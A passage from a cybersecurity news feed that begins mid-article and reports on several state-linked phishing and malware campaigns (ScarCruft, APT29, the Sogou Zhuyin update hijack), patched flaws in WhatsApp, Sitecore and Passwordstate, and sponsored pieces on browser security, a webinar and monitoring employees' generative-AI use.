This will enable SOC teams to gain faster incident responses and better support threat hunting activities. Doing so can improve alert times on attacks and strengthen the overall security posture of an organization. Browser Security Use Cases and Business Impacts Deploying browser-native protection delivers measurable strategic benefits. Use Case Strategic Advantage Phishing & Attack Prevention Stops in-browser credential theft before execution Web Extension Management Control installs and permission requests from known and unknown web extensions Secure Enablement of GenAI Implements adaptive, policy-based, and context-aware access to generative AI tools Data Loss Prevention Ensures that no corporate data gets exposed or shared with unauthorized parties BYOD & Contractor Security Secures unmanaged devices with per-session browser controls Zero Trust Reinforcement Treats each browser session as an untrusted boundary, validating behavior contextually Application Connection Ensures that a user is authenticated properly with the right levels of protection Secure Remote SaaS Access Enables secure connection to internal SaaS apps without the need for additional agents or VPNs Recommendations for Security Leadership Assess Your Risk Posture: Use tools like Browser Total™ to determine where browser vulnerabilities lie across your organization.

Enable Browser Protection: Deploy a solution that’s capable of real-time JavaScript protection, token security, extension oversight, and telemetry across Chrome, Edge, Firefox, Safari, and all other browsers. Define Contextual Policies: Enforce rules on web APIs, the capturing of credentials, installing web extensions, and downloads. Integrate with Your Existing Stack: Feed browser-enabled threat telemetry into SIEM, SOAR, or EDR tools that you already use daily. This will enrich your detection and response capabilities.

Educate Your Team: Cement browser security as a core principle of your Zero Trust architecture, SaaS protection, and BYOD access. Continuously Test and Validate: Simulate real browser-based attacks so you can validate your defenses and learn where your blind spots may be. Harden Identity Access Across Browsers: Put adaptive authentication in place that continuously validates identity within each session. Regularly Audit Browser Extensions: Develop review processes to keep track of all extensions in use.

Apply Least-Privilege to Web APIs: Restrict sensitive browser APIs to only the business apps that require them. Automate Browser Threat Hunting: Leverage browser telemetry and integrate the data with your existing stack to hunt for suspicious patterns. Final Thought: Browsers as the New Identity Perimeter The Scattered Spider group personifies how attackers can evolve their tactics from targeting an endpoint to focusing on the enterprise’s most used application, the browser. They do so to steal identities, take over sessions, and remain inside a user’s environment without a trace.

CISOs must adapt and use browser-native security controls to stop these identity-based threats. Investing in a frictionless, runtime-aware security platform is the answer. Instead of being reactionary, security teams can stop attacks at the source. For all security leaders, enterprise browser protection doesn’t just work to mitigate attackers like Scattered Spider; it fortifies the window into your enterprise and upgrades the security posture for all SaaS applications, remote work, and beyond.

To learn more about Secure Enterprise Browsers and how they can benefit your organization, speak to a Seraphic expert . Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

ScarCruft Uses RokRAT Malware in Operation HanKook Phantom Targeting South Korean Academics

Cybersecurity researchers have discovered a new phishing campaign undertaken by the North Korea-linked hacking group called ScarCruft (aka APT37) to deliver a malware known as RokRAT. The activity has been codenamed Operation HanKook Phantom by Seqrite Labs, stating the attacks appear to target individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers. “The attackers likely aim to steal sensitive information, establish persistence, or conduct espionage,” security researcher Dixit Panchal said in a report published last week. The starting point of the attack chain is a spear-phishing email containing a lure for “National Intelligence Research Society Newsletter—Issue 52,” a periodic newsletter issued by a South Korean research group focused on national intelligence, labour relations, security, and energy issues.

The digital missive contains a ZIP archive attachment that contains a Windows shortcut (LNK) masquerading as a PDF document, which, when opened, launches the newsletter as a decoy while dropping RokRAT on the infected host. RokRAT is a known malware associated with APT37, with the tool capable of collecting system information, executing arbitrary commands, enumerating the file system, capturing screenshots, and downloading additional payloads. The gathered data is exfiltrated via Dropbox, Google Cloud, pCloud, and Yandex Cloud. Seqrite said it detected a second campaign in which the LNK file serves as a conduit for a PowerShell script that, besides dropping a decoy Microsoft Word document, runs an obfuscated Windows batch script that’s responsible for deploying a dropper.

The binary then runs a next-stage payload to steal sensitive data from the compromised host while concealing network traffic as a Chrome file upload. The lure document used in this instance is a statement issued by Kim Yo Jong, the Deputy Director of the Publicity and Information Department of the Workers’ Party of Korea and, dated July 28, rejecting Seoul’s efforts at reconciliation. “The analysis of this campaign highlights how APT37 (ScarCruft/InkySquid) continues to employ highly tailored spear-phishing attacks, leveraging malicious LNK loaders, fileless PowerShell execution, and covert exfiltration mechanisms,” Panchal said. “The attackers specifically target South Korean government sectors, research institutions, and academics with the objective of intelligence gathering and long-term espionage.” The development comes as cybersecurity company QiAnXin detailed attacks mounted by the infamous Lazarus Group (aka QiAnXin) using ClickFix -style tactics to trick job seekers into downloading a supposed NVIDIA-related update to address camera or microphone issues when providing a video assessment.

Details of this activity were previously disclosed by Gen Digital in late July 2025. The ClickFix attack results in the execution of a Visual Basic Script that leads to the deployment of BeaverTail , a JavaScript stealer that can also deliver a Python-based backdoor dubbed InvisibleFerret. Furthermore, the attacks pave the way for a backdoor with command execution and file read/write capabilities. The disclosure also follows new sanctions imposed by the U.S.

Department of the Treasury’s Office of Foreign Assets Control (OFAC) against two individuals and two entities for their role in the North Korean remote information technology (IT) worker scheme to generate illicit revenue for the regime’s weapons of mass destruction and ballistic missile programs. The Chollima Group, in a report released last week, detailed its investigation into an IT Worker cluster affiliated with Moonstone Sleet that it tracks as BABYLONGROUP in connection with a blockchain play-to-earn (P2E) game called DefiTankLand . It’s assessed that Logan King, the supposed CTO of DefiTankLand, is actually a North Korean IT Worker, a hypothesis bolstered by the fact that King’s GitHub account has been used as a reference by a Ukrainian freelancer and blockchain developer named “Ivan Kovch.” “Many members had previously worked on a huge cryptocurrency project on behalf of a shady company called ICICB (who we believe to be a front), that one of the non-DPRK members of the cluster runs the Chinese cybercrime market FreeCity, and an interesting connection between DeTankZone and an older IT Worker who previously operated out of Tanzania,” the Chollima Group said . “While the DefiTankLand CEO Nabil Amrani has worked previously with Logan on other blockchain projects, we do not believe he is responsible for any of the development.

This all means that the “legitimate” game behind Moonstone Sleet’s DeTankZone was in fact developed by DPRK IT Workers, only to be later picked up and used by a North Korean APT Group.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling

Cybersecurity researchers have called attention to a cyber attack in which unknown threat actors deployed an open-source endpoint monitoring and digital forensic tool called Velociraptor , illustrating ongoing abuse of legitimate software for malicious purposes. “In this incident, the threat actor used the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command-and-control (C2) server,” the Sophos Counter Threat Unit Research Team said in a report published this week. While threat actors are known to adopt living-off-the-land (LotL) techniques or take advantage of legitimate remote monitoring and management (RMM) tools in their attacks, the use of Velociraptor signals a tactical evolution, where incident response programs are being used to obtain a foothold and minimize the need for having to deploy their own malware. Further analysis of the incident has revealed that the attackers used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which serves as a staging ground for other tools used by them, including a Cloudflare tunneling tool and a remote administration utility known as Radmin.

The MSI file is designed to install Velociraptor, which then establishes contact with another Cloudflare Workers domain. The access is then leveraged to download Visual Studio Code from the same staging server using an encoded PowerShell command and execute the source code editor with the tunnel option enabled in order to allow both remote access and remote code execution. The threat actors have also been observed utilizing the msiexec Windows utility again to download additional payloads from the workers[.]dev folder. “Organizations should monitor for and investigate unauthorized use of Velociraptor and treat observations of this tradecraft as a precursor to ransomware,” Sophos said.

“Implementing an endpoint detection and response system, monitoring for unexpected tools and suspicious behaviors, and following best practices for securing systems and generating backups can mitigate the ransomware threat.” The disclosure comes as cybersecurity firms Hunters and Permiso detailed a malicious campaign that has leveraged Microsoft Teams for initial access, reflecting a growing pattern of threat actors weaponizing the platform’s trusted and deeply embedded role in enterprise-focused communications for malware deployment. These attacks begin with the threat actors using newly created or compromised tenants to send direct messages or initiate calls to targets, impersonating IT help desk teams or other trusted contacts to install remote access software like AnyDesk, DWAgent, or Quick Assist, and seize control of victim systems to deliver malware. While similar techniques involving remote access tools have been linked to ransomware groups like Black Basta since mid-2024, these newer campaigns forgo the preliminary email bombing step and ultimately make use of the remote access to deliver a PowerShell payload with capabilities commonly associated with credential theft, persistence, and remote code execution. “The lures used to initiate engagement are tailored to appear routine and unremarkable, typically framed as IT assistance related to Teams performance, system maintenance, or general technical support,” Permiso researcher Isuf Deliu said.

“These scenarios are designed to blend into the background of everyday corporate communication, making them less likely to trigger suspicion.” It’s worth noting that similar tactics have been employed to propagate malware families like DarkGate and Matanbuchus malware over the past year. The attacks also serve a Windows credential prompt to trick users into entering their passwords under the guise of a benign system configuration request, which are then harvested and saved to a text file on the system. “Microsoft Teams phishing isn’t a fringe technique anymore — it’s an active, evolving threat that bypasses traditional email defenses and exploits trust in collaboration tools,” security researchers Alon Klayman and Tomer Kachlon said. “By monitoring audit logs like ChatCreated and MessageSent, enriching signals with contextual data, and training users to spot IT/help desk impersonations, SOC teams can close this new gap before it’s exploited.” The findings also follow the discovery of a novel malvertising campaign that combines legitimate office[.]com links with Active Directory Federation Services ( ADFS ) to redirect users to Microsoft 365 phishing pages that are capable of harvesting login information.

The attack chain, in a nutshell, begins when a victim clicks on a rogue sponsored link on search engine results pages, triggering a redirect chain that ultimately leads them to a fake login page mimicking Microsoft. “It turns out the attacker had set up a custom Microsoft tenant with Active Directory Federation Services (ADFS) configured,” Push Security’s Luke Jennings said . “This means Microsoft will perform the redirect to the custom malicious domain.” “While this isn’t a vulnerability per se, the ability for attackers to add their own Microsoft ADFS server to host their phishing page and have Microsoft redirect to it is a concerning development that will make URL-based detections even more challenging than they already are.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

WhatsApp Patches Zero-Click Exploit Targeting iOS and macOS Devices

WhatsApp has addressed a security vulnerability in its messaging apps for Apple iOS and macOS that it said may have been exploited in the wild in conjunction with a recently disclosed Apple flaw in targeted zero-day attacks. The vulnerability, CVE-2025-55177 (CVSS score: 8.0 [CISA-ADP]/5.4 [Facebook]), relates to a case of insufficient authorization of linked device synchronization messages. Internal researchers on the WhatsApp Security Team have been credited with discovering and rerating the bug. The Meta-owned company said the issue “could have allowed an unrelated user to trigger processing of content from an arbitrary URL on a target’s device.” The flaw affects the following versions - WhatsApp for iOS prior to version 2.25.21.73 (Patched on July 28, 2025) WhatsApp Business for iOS version 2.25.21.78 (Patched on August 4, 2025), and WhatsApp for Mac version 2.25.21.78 (Patched on August 4, 2025) It also assessed that the shortcoming may have been chained with CVE-2025-43300, a vulnerability affecting iOS, iPadOS, and macOS, as part of a sophisticated attack against specific targeted users.

CVE-2025-43300 was disclosed by Apple last week as having been weaponized in an “extremely sophisticated attack against specific targeted individuals.” The vulnerability in question is an out-of-bounds write vulnerability in the ImageIO framework that could result in memory corruption when processing a malicious image. Donncha Ó Cearbhaill, head of the Security Lab at Amnesty International, said WhatsApp has notified an unspecified number of individuals that they believe were targeted by an advanced spyware campaign in the past 90 days using CVE-2025-55177. In the alert sent to the targeted individuals, WhatsApp has also recommended performing a full device factory reset and keeping their operating system and the WhatsApp app up-to-date for optimal protection. It’s currently not known who, or which spyware vendor, is behind the attacks.

Ó Cearbhaill described the pair of vulnerabilities as a “zero-click” attack, meaning it does not require any user interaction, such as clicking a link, to compromise their device. “Early indications are that the WhatsApp attack is impacting both iPhone and Android users, civil society individuals among them,” Ó Cearbhaill said . “Government spyware continues to pose a threat to journalists and human rights defenders.” Update In a statement shared with The Hacker News, WhatsApp said it sent in-app threat notifications to less than 200 users who may have been targeted as part of the campaign. (The story was updated after publication to clarify that patches were released for the flaw in late July/August 2025.) Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Researchers Warn of Sitecore Exploit Chain Linking Cache Poisoning and Remote Code Execution

Three new security vulnerabilities have been disclosed in the Sitecore Experience Platform that could be exploited to achieve information disclosure and remote code execution. The flaws, per watchTowr Labs , are listed below - CVE-2025-53693

• HTML cache poisoning through unsafe reflections CVE-2025-53691
• Remote code execution (RCE) through insecure deserialization CVE-2025-53694
• Information Disclosure in ItemService API with a restricted anonymous user, leading to exposure of cache keys using a brute-force approach Patches for the first two shortcomings were released by Sitecore in June and for the third in July 2025 , with the company stating that “successful exploitation of the related vulnerabilities might lead to remote code execution and non-authorized access to information.” The findings build on three more flaws in the same product that were detailed by watchTowr back in June - CVE-2025-34509 (CVSS score: 8.2) - Use of hard-coded credentials CVE-2025-34510 (CVSS score: 8.8) - Post-authenticated remote code execution via path traversal CVE-2025-34511 (CVSS score: 8.8) - Post-authenticated remote code execution via Sitecore PowerShell Extension watchTowr Labs researcher Piotr Bazydlo said the newly uncovered bugs could be fashioned into an exploit chain by bringing together the pre-auth HTML cache poisoning vulnerability with a post-authenticated remote code execution issue to compromise a fully-patched Sitecore Experience Platform instance. The entire sequence of events leading up to code execution is as follows: A threat actor could leverage the ItemService API, if exposed, to trivially enumerate HTML cache keys stored in the Sitecore cache and send HTTP cache poisoning requests to those keys. This could then be chained with CVE-2025-53691 to supply malicious HTML code that ultimately results in code execution by means of an unrestricted BinaryFormatter call.

“We managed to abuse a very restricted reflection path to call a method that lets us poison any HTML cache key,” Bazydlo said. “That single primitive opened the door to hijacking Sitecore Experience Platform pages - and from there, dropping arbitrary JavaScript to trigger a Post-Auth RCE vulnerability.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Webinar: Learn How to Unite Dev, Sec, and Ops Teams With One Shared Playbook

Picture this: Your team rolls out some new code, thinking everything’s fine. But hidden in there is a tiny flaw that explodes into a huge problem once it hits the cloud. Next thing you know, hackers are in, and your company is dealing with a mess that costs millions. Scary, right?

In 2025, the average data breach hits businesses with a whopping $4.44 million bill globally. And guess what? A big chunk of these headaches comes from app security slip-ups, like web attacks that snag credentials and wreak havoc. If you’re in dev, ops, or security, you’ve probably felt that stress—endless alerts, teams arguing over who’s to blame, and fixes that take forever.

But hey, it doesn’t have to be this way. What if you could spot those risks early, from the moment code is written all the way to when it’s running in the cloud? That’s the magic of code-to-cloud visibility, and it’s changing how smart teams handle app security. Our upcoming webinar, “Code-to-Cloud Visibility: The New Foundation for Modern AppSec,” is your chance to learn how.

It’s happening on September 8, 2025—just a few weeks away. This isn’t some boring lecture; it’s real talk from experts who’ve been there, packed with tips you can use right away. Sign up for the Webinar Now and grab your spot before it’s gone! The Real Headache Hiding in Your Apps Let’s be honest: As companies grow and push more work onto dev teams, things get messy.

Risks pop up in code but only show up later in the cloud, leading to confusion, slow fixes, and attackers getting the jump on you. Recent reports show that inefficient vulnerability handling is a top pain for 32% of organizations, and securing AI tools like GenAI is right behind at 30%. Even worse, 97% of companies are dealing with GenAI-related security issues. Without a clear view from code to cloud, you’re basically guessing—and that leaves doors open for bad guys.

I’ve chatted with folks in the trenches who share war stories: Late nights scrambling to patch holes that could’ve been fixed days earlier. It’s draining, and with breaches costing more than ever, it’s hitting the bottom line hard. The good news? Code-to-cloud visibility connects the dots, giving you full sight into vulnerabilities, secrets, and setup mistakes.

It helps teams catch issues early, fix them fast, and work together better—no more finger-pointing. What You’ll Walk Away With: Simple Steps to Level Up Your Security In this quick 60-minute chat, our pros will break down why this approach is becoming a must-have for app security programs. Gartner says by 2026, 40% of companies will jump on board with tools like ASPM to handle risks smarter. We’ll keep it straightforward, no tech overload—just practical stuff.

Here’s what you’ll get:

Get Everyone on the Same Page

See how linking code risks to cloud behavior creates a simple shared plan. Dev, ops, and security teams can finally team up, cut the noise, and speed up feedback. Focus on What Really Matters

Learn easy ways to map out risks and zero in on your key apps. We’ll share real examples, like tracing a code glitch to its cloud weak spot, so you can plug holes before hackers notice.

Fix Things Quicker

Grab step-by-step ideas to automate fixes and slash remediation time—some teams see drops of 30% or more in vulnerabilities and days shaved off fixes. Imagine adding this to your workflow without slowing down your work. Stay Ahead of New Threats

We’ll cover hot topics like safe AI use and rules pushing for better security. Plus, a handy checklist to check your setup and quick wins to try tomorrow.

People who’ve joined similar sessions say it changed how they work: “It connected the dots and stopped us from chasing shadows,” one ops guy told me. Ready to make that change for your team? Sign up for the Webinar Now and start turning those insights into action. Watch this Webinar Now Why Jump In Now?

Threats Aren’t Waiting With big attacks making headlines—like the PowerSchool breach hitting millions or ransomware messing with supply chains in 2025—delaying isn’t smart. Code-to-cloud visibility isn’t fancy tech; it’s your shield to bake security in from start to finish. Don’t wait for a crisis—get ahead and make your apps tougher. Seats are going quickly, so sign up today.

You’ll also snag a free ASPM checklist and the recording to watch later. It’s a small time investment for big peace of mind. Sign Up for the Webinar Now – Can’t wait to see you there! Found this article interesting?

This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Amazon Disrupts APT29 Watering Hole Campaign Abusing Microsoft Device Code Authentication

Amazon on Friday said it flagged and disrupted what it described as an opportunistic watering hole campaign orchestrated by the Russia-linked APT29 actors as part of their intelligence gathering efforts. The campaign used “compromised websites to redirect visitors to malicious infrastructure designed to trick users into authorizing attacker-controlled devices through Microsoft’s device code authentication flow,” Amazon’s Chief Information Security Officer CJ Moses said . APT29, also tracked as BlueBravo, Cloaked Ursa, CozyLarch, Cozy Bear, Earth Koshchei, ICECAP, Midnight Blizzard, and The Dukes, is the name assigned to a state-sponsored hacking group with ties to Russia’s Foreign Intelligence Service (SVR). In recent months, the prolific threat actor has been linked to attacks leveraging malicious Remote Desktop Protocol (RDP) configuration files to target Ukrainian entities and exfiltrate sensitive data.

Since the start of the year, the adversarial collective has been observed adopting various phishing methods, including device code phishing and device join phishing , to obtain unauthorized access to Microsoft 365 accounts. As recently as June 2025, Google said it observed a threat cluster with affiliations to APT29 weaponizing a Google account feature called application-specific passwords to gain access to victims’ emails. The highly targeted campaign was attributed to UNC6293. The latest activity identified by Amazon’s threat intelligence team underscores the threat actor’s continued efforts to harvest credentials and gather intelligence of interest, while simultaneously sharpening their tradecraft.

“This opportunistic approach illustrates APT29’s continued evolution in scaling their operations to cast a wider net in their intelligence collection efforts,” Moses said. The attacks involved APT29 compromising various legitimate websites and injecting JavaScript that redirected approximately 10% of visitors to actor-controlled domains, such as findcloudflare[.]com, that mimicked Cloudflare verification pages to give an illusion of legitimacy. In reality, the end goal of the campaign was to entice victims into entering a legitimate device code generated by the threat actor into a sign-in page, effectively granting them access to their Microsoft accounts and data. This technique was detailed by both Microsoft and Volexity back in February 2025.

The activity is also noteworthy for incorporating various evasion techniques, such as Base64 encoding to conceal malicious code, setting cookies to prevent repeated redirects of the same visitor, and shifting to new infrastructure when blocked. Amazon told The Hacker News that it doesn’t have additional information on how many websites were compromised as part of this effort, and how these sites were hacked in the first place. The tech giant also noted that it was able to link the domains used in this campaign with infrastructure previously attributed to APT29. “Despite the actor’s attempts to migrate to new infrastructure, including a move off AWS to another cloud provider, our team continued tracking and disrupting their operations,” Moses said.

“After our intervention, we observed the actor register additional domains such as cloudflare.redirectpartners[.]com, which again attempted to lure victims into Microsoft device code authentication workflows.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Abandoned Sogou Zhuyin Update Server Hijacked, Weaponized in Taiwan Espionage Campaign

An abandoned update server associated with input method editor (IME) software Sogou Zhuyin was leveraged by threat actors as part of an espionage campaign to deliver several malware families, including C6DOOR and GTELAM, in attacks primarily targeting users across Eastern Asia. “Attackers employed sophisticated infection chains, such as hijacked software updates and fake cloud storage or login pages, to distribute malware and collect sensitive information,” Trend Micro researchers Nick Dai and Pierre Lee said in an exhaustive report. The campaign, identified in June 2025, has been codenamed TAOTH by the cybersecurity company. Targets of the activity mainly include dissidents, journalists, researchers, and technology/business leaders in China, Taiwan, Hong Kong, Japan, South Korea, and overseas Taiwanese communities.

Taiwan accounts for 49% of all targets, followed by Cambodia (11%) and the U.S. (7%). It’s said the attackers, in October 2024, took control of the lapsed domain name (“sogouzhuyin[.]com”) associated with Sogou Zhuyin, a legitimate IME service that stopped receiving updates in June 2019, to disseminate malicious payloads a month later. It’s estimated that several hundred victims were impacted.

“The attacker took over the abandoned update server and, after registering it, used the domain to host malicious updates since October 2024,” the researchers said. “Through this channel, multiple malware families have been deployed, including GTELAM, C6DOOR, DESFY, and TOSHIS.” The deployed malware families serve different purposes, including remote access (RAT), information theft, and backdoor functionality. To evade detection, the threat actors also leveraged third-party cloud services to conceal their network activities across the attack chain. These malware strains enable remote access, information theft, and backdoor functionality, with the attackers also using legitimate cloud storage services like Google Drive as a data exfiltration point and to conceal the malicious network traffic.

The attack chain begins when unsuspecting users download the official installer for Sogou Zhuyin from the Internet, such as the Traditional Chinese Wikipedia page entry for Sogou Zhuyin, which, in March 2025, was modified to point users to the malicious domain dl[.]sogouzhuyin[.]com. While the installer is completely innocuous, the malicious activity kicks in when the automatic update process is triggered a couple of hours after installation, causing the updater binary, “ZhuyinUp.exe,” to fetch an update configuration file from an embedded URL: “srv-pc.sogouzhuyin[.]com/v1/upgrade/version.” It’s this update process that has been tampered with to DESFY, GTELAM, C6DOOR, and TOSHIS with the ultimate goal of profiling and gathering data from high-value targets - TOSHIS (First detected December 2024), a loader designed to fetch next-stage payloads (Cobalt Strike or Merlin agent for Mythic framework) from an external server. It’s also a variant of Xiangoop , which has been attributed to Tropic Trooper and has been used to deliver Cobalt Strike or a backdoor called EntryShell in the past. DESFY (First detected May 2025), a spyware that collects file names from two locations: Desktop and Program Files GTELAM (First detected May 2025), another spyware that collects file names matching a specific set of extensions (PDF, DOC, DOCX, XLS, XLSX, PPT, and PPTX), and exfiltrates the details to Google Drive C6DOOR , a bespoke Go-based backdoor that uses HTTP and WebSocket protocols for command-and-control so as to receive instructions to gather system information, run arbitrary commands, perform file operations, upload/download files, capture screenshots, list running processes, enumerate directories, and inject shellcode into a targeted process Further analysis of C6DOOR has uncovered the presence of embedded Simplified Chinese characters within the sample, suggesting that the threat actor behind the artifact may be proficient in Chinese.

“It appears that the attacker was still in the reconnaissance phase, primarily seeking high-value targets,” Trend Micro said. “As a result, no further post-exploitation activities were observed in the majority of victim systems. In one of the cases we analyzed, the attacker was inspecting the victim’s environment and establishing a tunnel using Visual Studio Code.” Interestingly, there is evidence that TOSHIS was also distributed to targets using a phishing website, likely in connection with a spear-phishing campaign targeting Eastern Asia and, to a lesser extent, Norway and the U.S. The phishing attacks have also been observed adopting a two-pronged approach - Serving fake login pages with lures related to free coupons or PDF readers that redirect and grant OAuth consent to attacker-controlled apps, or Serving fake cloud storage pages that mimic Tencent Cloud StreamLink to download malicious ZIP archives containing TOSHIS These phishing emails include a booby-trapped URL and a decoy document that tricks the recipient into interacting with the malicious content, ultimately activating a multi-stage attack sequence designed to drop TOSHIS using DLL side-loading or obtain unauthorized access and control over their Google or Microsoft mailboxes through an OAuth permission prompt.

Trend Micro said the TAOTH shares infrastructure and tooling overlap with previously documented threat activity by ITOCHU, painting the picture of a persistent threat actor with a focus on reconnaissance, espionage, and email abuse. To combat these threats, organizations are recommended to routinely audit their environments for any end-of-support software and promptly remove or replace such applications. Users are urged to review the permissions requested by cloud applications before granting access. “In the Sogou Zhuyin operation, the threat actor maintained a low profile, conducting reconnaissance to identify valuable targets among victims,” the company said.

“Meanwhile, in the ongoing spear-phishing operations, the attacker distributed malicious emails to the targets for further exploitation.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Can Your Security Stack See ChatGPT? Why Network Visibility Matters

Generative AI platforms like ChatGPT, Gemini, Copilot, and Claude are increasingly common in organizations. While these solutions improve efficiency across tasks, they also present new data leak prevention for generative AI challenges. Sensitive information may be shared through chat prompts, files uploaded for AI-driven summarization, or browser plugins that bypass familiar security controls. Standard DLP products often fail to register these events.

Solutions such as Fidelis Network ® Detection and Response (NDR) introduce network-based data loss prevention that brings AI activity under control. This allows teams to monitor, enforce policies, and audit GenAI use as part of a broader data loss prevention strategy. Why Data Loss Prevention Must Evolve for GenAI Data loss prevention for generative AI requires shifting focus from endpoints and siloed channels to visibility across the entire traffic path. Unlike earlier tools that rely on scanning emails or storage shares, NDR technologies like Fidelis identify threats as they traverse the network, analyzing traffic patterns even if the content is encrypted.

The critical concern is not just who created the data, but when and how it leaves the organization’s control, whether through direct uploads, conversational queries, or integrated AI features in business systems. Monitoring Generative AI Usage Effectively Organizations can use GenAI DLP solutions based on network detection across three complementary approaches: URL-Based Indicators and Real-Time Alerts Administrators can define indicators for specific GenAI platforms, for example, ChatGPT. These rules can be applied to multiple services and tailored to relevant departments or user groups. Monitoring can run across web, email, and other sensors.

Process: When a user accesses a GenAI endpoint, Fidelis NDR generates an alert If a DLP policy is triggered, the platform records a full packet capture for subsequent analysis Web and mail sensors can automate actions, such as redirecting user traffic or isolating suspicious messages Advantages: Real-time notifications enable prompt security response Supports comprehensive forensic analysis as needed Integrates with incident response playbooks and SIEM or SOC tools Considerations: Maintaining up-to-date rules is necessary as AI endpoints and plugins change High GenAI usage may require alert tuning to avoid overload Metadata-Only Monitoring for Audit and Low-Noise Environments Not every organization needs immediate alerts for all GenAI activity. Network-based data loss prevention policies often record activity as metadata, creating a searchable audit trail with minimal disruption. Alerts are suppressed, and all relevant session metadata is retained Sessions log source and destination IP, protocol, ports, device, and timestamps Security teams can review all GenAI interactions historically by host, group, or time frame Benefits: Reduces false positives and operational fatigue for SOC teams Enables long-term trend analysis and audit or compliance reporting Limits: Important events may go unnoticed if not regularly reviewed Session-level forensics and full packet capture are only available if a specific alert escalates In practice, many organizations use this approach as a baseline, adding active monitoring only for higher-risk departments or activities. Detecting and Preventing Risky File Uploads Uploading files to GenAI platforms introduces a higher risk, especially when handling PII, PHI, or proprietary data.

Fidelis NDR can monitor such uploads as they happen. Effective AI security and data protection means closely inspecting these movements. Process: The system recognizes when files are being uploaded to GenAI endpoints DLP policies automatically inspect file contents for sensitive information When a rule matches, the full context of the session is captured, even without user login, and device attribution provides accountability Advantages: Detects and interrupts unauthorized data egress events Enables post-incident review with full transactional context Considerations: Monitoring works only for uploads visible on managed network paths Attribution is at the asset or device level unless user authentication is present Weighing Your Options: What Works Best Real-Time URL Alerts Pros: Enables rapid intervention and forensic investigation, supports incident triage and automated response Cons: May increase noise and workload in high-use environments, needs routine rule maintenance as endpoints evolve Metadata-Only Mode Pros: Low operational overhead, strong for audits and post-event review, keeps security attention focused on true anomalies Cons: Not suited for immediate threats, investigation required post-factum File Upload Monitoring Pros: Targets actual data exfiltration events, provides detailed records for compliance and forensics Cons: Asset-level mapping only when login is absent, blind to off-network or unmonitored channels Building Comprehensive AI Data Protection A comprehensive GenAI DLP solutions program involves: Maintaining live lists of GenAI endpoints and updating monitoring rules regularly Assigning monitoring mode, alerting, metadata, or both, by risk and business need Collaborating with compliance and privacy leaders when defining content rules Integrating network detection outputs with SOC automation and asset management systems Educating users on policy compliance and visibility of GenAI usage Organizations should periodically review policy logs and update their system to address new GenAI services, plugins, and emerging AI-driven business uses. Best Practices for Implementation Successful deployment requires: Clear platform inventory management and regular policy updates Risk-based monitoring approaches tailored to organizational needs Integration with existing SOC workflows and compliance frameworks User education programs that promote responsible AI usage Continuous monitoring and adaptation to evolving AI technologies Key Takeaways Modern network-based data loss prevention solutions, as illustrated by Fidelis NDR, help enterprises balance the adoption of generative AI with strong AI security and data protection.

By combining alert-based, metadata, and file-upload controls, organizations build a flexible monitoring environment where productivity and compliance coexist. Security teams retain the context and reach needed to handle new AI risks, while users continue to benefit from the value of GenAI technology. Found this article interesting? This article is a contributed piece from one of our valued partners.

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Click Studios Patches Passwordstate Authentication Bypass Vulnerability in Emergency Access Page

Click Studios, the developer of enterprise-focused password management solution Passwordstate, said it has released security updates to address an authentication bypass vulnerability in its software. The high-severity issue , which is yet to be assigned a CVE identifier, has been addressed in Passwordstate 9.9 (Build 9972), released August 28, 2025. The Australian company said it fixed a “potential Authentication Bypass when using a carefully crafted URL against the core Passwordstate Products’ Emergency Access page.” Also included in the latest version are improved protections to safeguard against potential clickjacking attacks aimed at its browser extension, should users end up visiting compromised sites. The safeguards are likely in response to findings from security researcher Marek Tóth, who, earlier this month, detailed a technique called Document Object Model (DOM)-based extension clickjacking that several password manager browser add-ons have been found vulnerable to.

“A single click anywhere on an attacker-controlled website could allow attackers to steal users’ data (credit card details, personal data, login credentials, including TOTP),” Tóth said . “The new technique is general and can be applied to other types of extensions.” According to Click Studios, the credential manager is used by 29,000 customers and 370,000 security and IT professionals, spanning global enterprises, government agencies, financial institutions, and Fortune 500 companies. The disclosure comes over four years after the company suffered a supply chain breach that enabled attackers to hijack the software’s update mechanism in order to drop malware capable of harvesting sensitive information from compromised systems. Then in December 2022, Click Studios also resolved multiple security flaws in Passwordstate, including an authentication bypass for Passwordstate’s API (CVE-2022-3875, CVSS score: 9.1) that could have been exploited by an unauthenticated remote adversary to obtain a user’s plaintext passwords.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.